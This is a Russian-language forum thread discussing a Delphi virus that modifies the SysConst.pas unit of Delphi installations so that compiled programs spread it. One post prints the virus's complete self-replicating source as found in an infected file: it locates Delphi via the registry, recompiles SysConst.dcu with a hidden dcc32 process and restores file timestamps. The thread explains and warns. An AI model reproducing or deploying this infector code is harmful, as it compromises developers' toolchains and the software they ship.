Delphi-“вирус” проверьте свою установленную Delphi!

[uberchel]

Цитата:

Сообщение от s.Creator

А сколько надо кода чтобы написать так?:
- копируем SysConst.pas во временную папку.
- добавляем в него код вируса.
- компилируем его командной строкой с помощью dcc32.exe (WinExec(...))
- меняем файлы и их времена создания, модификации.
- удаляем временные

Я же не про функционал, тут понятно из приведенного кода, то что выполняет эти действия, я же написал что это может быть не весь функционал вируса, может есть еще что, что то он делает, просто этого кода в данном нет и это не полный исходник виря! при компиляции этого кода пусть он 4кб займёт ну ни как не 7-8кб! Допустим сделали консольное приложение, с использованием модуля WINDOWS И ПУСТЬ ДАЖЕ SYSUNTIL, а SYSCONS добавляться всегда автоматом, открой в рес-хакере и увидишь тип String - вот это и есть, и даже этот консольник после компиляции будет весить 15-17 кб.

[Dj_smart]

*** ВАШУ МАТЬ! ЙА ЗАРАЖЕН!
Есть предложение - добавить опрос заражен ли был, чтоб узнать популярность

[uberchel]

Цитата:

*** ВАШУ МАТЬ! ЙА ЗАРАЖЕН!
Есть предложение - добавить опрос заражен ли был, чтоб узнать популярность

Я думаю с десь больше половины зараженных )

[JTG]

Цитата:

я же написал что это может быть не весь функционал вируса, может есть еще что, что то он делает

Неа, это весь его функционал, полезной нагрузки нет.
Создаёт \lib\sysconst.pas, копирует в него \source\rtl\sys\SysConst.pas, дописывает код, компилит, удаляет. Не меняет дату создания. Выглядит модифицированый файл в точности так:

Код:

{ *********************************************************************** }
{                                                                         }
{ Delphi / Kylix Cross-Platform Runtime Library                           }
{                                                                         }
{ Copyright (c) 1995, 2001 Borland Software Corporation                   }
{                                                                         }
{ *********************************************************************** }

unit SysConst;                                   

interface

//оригинальный код

implementation
uses windows; var sc:array[1..24] of string=(
'uses windows; var sc:array[1..24] of string=(',
'function x(s:string):string;var i:integer;begin for i:=1 to length(s) do if s[i]',
'=#36 then s[i]:=#39;result:=s;end;procedure re(s,d,e:string);var f1,f2:textfile;',
'h:cardinal;f:STARTUPINFO;p:PROCESS_INFORMATION;b:boolean;t1,t2,t3:FILETIME;begin',
'h:=CreateFile(pchar(d+$bak$),0,0,0,3,0,0);if h<>DWORD(-1) then begin CloseHandle',
'(h);exit;end;{$I-}assignfile(f1,s);reset(f1);if ioresult<>0 then exit;assignfile',
'(f2,d+$pas$);rewrite(f2);if ioresult<>0 then begin closefile(f1);exit;end; while',
'not eof(f1) do begin readln(f1,s); writeln(f2,s);  if pos($implementation$,s)<>0',
'then break;end;for h:= 1 to 1 do writeln(f2,sc[h]);for h:= 1 to 23 do writeln(f2',
',$$$$+sc[h],$$$,$);writeln(f2,$$$$+sc[24]+$$$);$);for h:= 2 to 24 do writeln(f2,',
'x(sc[h]));closefile(f1);closefile(f2);{$I+}MoveFile(pchar(d+$dcu$),pchar(d+$bak$',
')); fillchar(f,sizeof(f),0); f.cb:=sizeof(f); f.dwFlags:=STARTF_USESHOWWINDOW;f.',
'wShowWindow:=SW_HIDE;b:=CreateProcess(nil,pchar(e+$"$+d+$pas"$),0,0,false,0,0,0,',
'f,p);if b then WaitForSingleObject(p.hProcess,INFINITE);MoveFile(pchar(d+$bak$),',
'pchar(d+$dcu$));DeleteFile(pchar(d+$pas$));h:=CreateFile(pchar(d+$bak$),0,0,0,3,',
'0,0);  if  h=DWORD(-1) then exit; GetFileTime(h,@t1,@t2,@t3); CloseHandle(h);h:=',
'CreateFile(pchar(d+$dcu$),256,0,0,3,0,0);if h=DWORD(-1) then exit;SetFileTime(h,',
'@t1,@t2,@t3); CloseHandle(h); end; procedure st; var  k:HKEY;c:array [1..255] of',
'char;  i:cardinal; r:string; v:char; begin for v:=$4$ to $7$ do if RegOpenKeyEx(',
'HKEY_LOCAL_MACHINE,pchar($Software\Borland\Delphi\$+v+$.0$),0,KEY_READ,k)=0 then',
'begin i:=255;if RegQueryValueEx(k,$RootDir$,nil,@i,@c,@i)=0 then begin r:=$$;i:=',
'1; while c[i]<>#0 do begin r:=r+c[i];inc(i);end;re(r+$\source\rtl\sys\SysConst$+',
'$.pas$,r+$\lib\sysconst.$,$"$+r+$\bin\dcc32.exe" $);end;RegCloseKey(k);end; end;',
'begin st; end.');
function x(s:string):string;var i:integer;begin for i:=1 to length(s) do if s[i]
=#36 then s[i]:=#39;result:=s;end;procedure re(s,d,e:string);var f1,f2:textfile;
h:cardinal;f:STARTUPINFO;p:PROCESS_INFORMATION;b:boolean;t1,t2,t3:FILETIME;begin
h:=CreateFile(pchar(d+'bak'),0,0,0,3,0,0);if h<>DWORD(-1) then begin CloseHandle
(h);exit;end;{'I-}assignfile(f1,s);reset(f1);if ioresult<>0 then exit;assignfile
(f2,d+'pas');rewrite(f2);if ioresult<>0 then begin closefile(f1);exit;end; while
not eof(f1) do begin readln(f1,s); writeln(f2,s);  if pos('implementation',s)<>0
then break;end;for h:= 1 to 1 do writeln(f2,sc[h]);for h:= 1 to 23 do writeln(f2
,''''+sc[h],''',');writeln(f2,''''+sc[24]+''');');for h:= 2 to 24 do writeln(f2,
x(sc[h]));closefile(f1);closefile(f2);{'I+}MoveFile(pchar(d+'dcu'),pchar(d+'bak'
)); fillchar(f,sizeof(f),0); f.cb:=sizeof(f); f.dwFlags:=STARTF_USESHOWWINDOW;f.
wShowWindow:=SW_HIDE;b:=CreateProcess(nil,pchar(e+'"'+d+'pas"'),0,0,false,0,0,0,
f,p);if b then WaitForSingleObject(p.hProcess,INFINITE);MoveFile(pchar(d+'bak'),
pchar(d+'dcu'));DeleteFile(pchar(d+'pas'));h:=CreateFile(pchar(d+'bak'),0,0,0,3,
0,0);  if  h=DWORD(-1) then exit; GetFileTime(h,@t1,@t2,@t3); CloseHandle(h);h:=
CreateFile(pchar(d+'dcu'),256,0,0,3,0,0);if h=DWORD(-1) then exit;SetFileTime(h,
@t1,@t2,@t3); CloseHandle(h); end; procedure st; var  k:HKEY;c:array [1..255] of
char;  i:cardinal; r:string; v:char; begin for v:='4' to '7' do if RegOpenKeyEx(
HKEY_LOCAL_MACHINE,pchar('Software\Borland\Delphi\'+v+'.0'),0,KEY_READ,k)=0 then
begin i:=255;if RegQueryValueEx(k,'RootDir',nil,@i,@c,@i)=0 then begin r:='';i:=
1; while c[i]<>#0 do begin r:=r+c[i];inc(i);end;re(r+'\source\rtl\sys\SysConst'+
'.pas',r+'\lib\sysconst.','"'+r+'\bin\dcc32.exe" ');end;RegCloseKey(k);end; end;
begin st; end.

Забавная фишка:

Код:

uses windows; var sc:array[1..24] of string=(
'uses windows; var sc:array[1..24] of string=(',...

Похоже на программу, выводящую собственный исходник

[SlashMan]

Спасибо) оказался заражен..

[GunSmoker]

Добавил в блог голосование.
Кому не лениво - просьба отметиться

[puporev]

А вот если я один и у меня нет "наших", то куда жать?

[inndim]

Хорошо что эта сволочь хоть резервную копию делает, а так если бы резервной копии не было, то пойди найди так сразу что и где было заменено и модифицированно, страшная штука млин.

[Utkin]

Информация не только полезна, но и вредна. Сотни пытливых студентиков, горящих желанием стать хакером наверняка возьмутся за эту возможность. А некоторые из студентов способные ребята... Так что есть вероятность возникновения клонов с вариациями - отсутствие резервной копии, вредоносные функции, шпионство и пр.

[Alex Cones]

Что-то мне подсказывает, что тут не все так просто. Если бы я оказался на месте этого *** (не дай бог), я бы не стал выкладывать все девственные файлы на поверхность. Даже если это тестовый запуск. Так что, думаю не помешало бы хорошенько проверить bak на наличие заразы.